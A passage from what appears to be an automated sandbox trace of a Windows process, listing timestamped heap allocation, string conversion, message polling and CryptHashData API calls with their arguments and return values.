(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b1748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0205.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.892] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.892] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.892] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0205.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.893] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0205.893] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0205.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0205.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0205.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x24aaec0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0205.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.896] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0205.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0205.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0205.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0205.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0205.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0205.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0205.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0205.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0205.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0205.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0205.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0205.896] CryptHashData (hHash=0xaa5660, pbData=0x24b17c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0205.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0205.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0205.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0205.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0205.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0205.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0205.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0205.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0205.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0205.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0205.900] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0205.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0205.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0205.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0205.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0205.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0205.901] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.901] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0205.901] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0205.901] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0205.901] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0205.901] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.901] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0205.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0205.902] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0205.902] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, 